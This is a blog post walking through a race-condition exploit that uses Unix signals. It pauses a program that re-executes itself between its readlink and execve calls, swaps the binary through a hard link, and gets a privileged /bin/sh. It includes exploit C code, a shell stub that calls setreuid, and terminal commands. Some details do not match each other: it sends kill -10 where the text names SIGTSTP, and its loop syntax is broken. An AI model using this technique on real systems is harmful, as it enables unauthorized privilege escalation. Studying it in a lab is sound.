Race Condition Exploit with Unix Signal
This is the first time, i learn about race condition exploit with Unix Signal
what a fresh idea!!
Example Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | #include <unistd.h> int main(int argc, char *argv[]) { char buf[4096]; if (argc < 2){ if (readlink("/proc/self/exe", buf, sizeof(buf)) < 0) return 1; char *args [] = { buf, "1", 0 }; if (execve(args[0], args, 0) < 0) return 1; } return 0; } // Sourced by StalkR | cs |
What this program works is
When argc is under 2, Getting itself path ( /proc/self/exe ) with readlink func, and running the program with execve..
It's All.
First time, i saw this source. How could i exploit it? What could i use?
and i search, then i finally found Race Condition Exploit with Unix Signal written by pwn3r
What is Unix Signal?
what is Unix Signal,
Description about Unix Signal : http://en.wikipedia.org/wiki/Unix_signal
In Short, Simply, specific process informs event occured specific thread through signal
and below signal is what we use today
SIGTSTP 20 Terminal stop signal (POSIX)
The Idea is, After Giving SIGTSTP Signal between readlink and execve ( then it'll be stopeed ), Changing origin program to what we wanna execute
what we wanna execute is executing /bin/sh program
then, what we need to make is..
- program which sends SIGTSTP signal
- program which executes /bin/sh
First, Sending SIGTSTP singal to stop vulnerable program.
Then, Changing the program to program which executes /bin/sh
this is how exploit is going
1 2 3 4 5 6 7 8 9 10 11 12 | #include <stdio.h> #include <signal.h> void signal_handler(int signo){ printf("Run~!\n"); } int main(){ signal(SIGTSTP, signal_handler); sleep(20); execl("/home/Desktop/Lab/rc",0); } | cs |
When getting SIGTSTP signal, signal_handler will be executed and execl func is executed. Because of registering singnal handler.
If you don't register hanlder, the program which sends SIGTSTP signal either might be stopped.
1 2 3 4 | int main(){ setreuid(geteuid(),geteuid()); execl("/bin/sh", "sh", 0); } | cs |
Conculsion
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | Terminal 1 zero@ubuntu:~Desktop/Lab$./rc Terminal 2 zero@ubuntu:~Desktop/Lab$ while[1]; do kill -10 pid; done Terminal 1 zero@ubuntu:~Desktop/Lab$./rc Run~! [1]+ Stopped ./rc Terminal 2 zero@ubuntu:~Desktop/Lab$ ln -f ./shell ./rc And Continue the process... Terminal 1 zero@ubuntu:~Desktop/Lab$fg 1 ./sig # | cs |
This is End
Ref : http://pwn3r.tistory.com/entry/Docs-Exploiting-Race-Condition-Vulnerability-with-Unix-Signal
Epilogue
Race Condition Exploit with Unix Signal ... Cool Exploit!
'Research > Exploitation' 카테고리의 다른 글
[Analysis] Linux Kernel 0-day on-going (0) | 2017.01.27 |
---|---|
[Analysis] Adobe Flash v18.0.194 UAF Vulnerability (cve-2015-5119) (0) | 2016.08.06 |